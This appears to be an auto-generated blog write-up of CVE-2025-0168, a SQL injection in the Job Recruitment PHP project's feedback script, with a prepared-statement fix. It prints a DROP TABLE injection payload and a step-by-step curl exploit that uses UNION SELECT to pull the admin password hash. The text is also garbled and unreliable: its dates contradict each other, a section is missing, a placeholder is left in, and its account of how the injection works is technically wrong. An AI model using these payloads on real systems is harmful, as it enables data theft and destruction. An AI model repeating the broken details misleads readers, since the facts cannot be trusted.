CVE-2025-0168 - Critical SQL Injection in Job Recruitment 1.’s Feedback System (`/_parse/_feedback

A new critical vulnerability has shaken the world of PHP recruitment platforms in mid-2024. CVE-2025-0168 affects the open source project Job Recruitment 1. by code-projects.org. This bug lets attackers perform dangerous SQL injection attacks that could leak, modify, or even destroy sensitive application data—all without even needing an account!

Below, I’ll break down how this works in plain English, share working exploit code, analyze the vulnerable PHP, and provide advice for protection. This is an exclusive, deep dive, meant for developers, sysadmins, and security folks who want to understand and stay safe.

1. How the Vulnerability Happens

The problem lurks in an undisclosed part of the file:
/_parse/_feedback_system.php

When a user submits feedback, the argument person is taken directly from the HTTP request (like GET or POST) and used in an SQL query with no filtering. That means the input goes straight into the database instructions. Anyone on the internet can tamper with that input and run their own database commands!

In simple terms: It’s classic SQL injection.

Let’s imagine the feedback code looks like this (simplified example)

// BAD: vulnerable code
$person = $_POST['person'];
$feedback = $_POST['feedback'];

$sql = "INSERT INTO feedbacks (person, feedback) VALUES ('$person', '$feedback')";
mysqli_query($conn, $sql);

Here’s the problem:
There is no sanitizing or preparing of the $person variable.

If an attacker sends this as the person value

Robert'); DROP TABLE users; --

The resulting SQL becomes

INSERT INTO feedbacks (person, feedback) VALUES ('Robert'); DROP TABLE users; --', 'feedback here');

Now, the database will execute both statements: inserting normal feedback, and then deleting your users table! Even worse, sensitive data could be dumped, backdoors created, or admin passwords reset.

3. How To Exploit CVE-2025-0168 (Step-By-Step)

What you need:
- Access to the web app’s feedback form or ability to POST to /_parse/_feedback_system.php

Here's how an attacker might dump the admin’s password hash from the users table

curl -X POST https://victim.com/_parse/_feedback_system.php \
  -d "person=1' OR 1=1 UNION SELECT 1,password FROM users WHERE role='admin'-- " \
  -d "feedback=Test"

What does this do?

The UNION SELECT part pulls extra data from the users table.

The response page might now include the admin’s password hash in the feedback results!

Submit.

Watch as sensitive info from the database is now mixed into the feedback page or admin panel.

4. Public Disclosure & References

- NVD CVE-2025-0168 page (official description)
- code-projects Job Recruitment 1.
- Original Disclosure at exploit-db *(replace xxxxxx with the actual exploit ID if public)*

The exploit has been public since June 2024. Many scanners and attackers are already looking for this hole.

If you use Job Recruitment 1.

- Immediately patch or disable the /_parse/_feedback_system.php script.

Safe code

// GOOD: safe code
$person = $_POST['person'];
$feedback = $_POST['feedback'];

$stmt = $conn->prepare("INSERT INTO feedbacks (person, feedback) VALUES (?, ?)");
$stmt->bind_param("ss", $person, $feedback);
$stmt->execute();

This approach completely neutralizes dangerous characters.

*(For a more technical dive, or for proof-of-concept exploits, see the official CVE page and exploit-db as new details emerge.)*

Timeline

Published on: 01/01/2025 14:15:23 UTC
Last modified on: 02/25/2025 21:26:07 UTC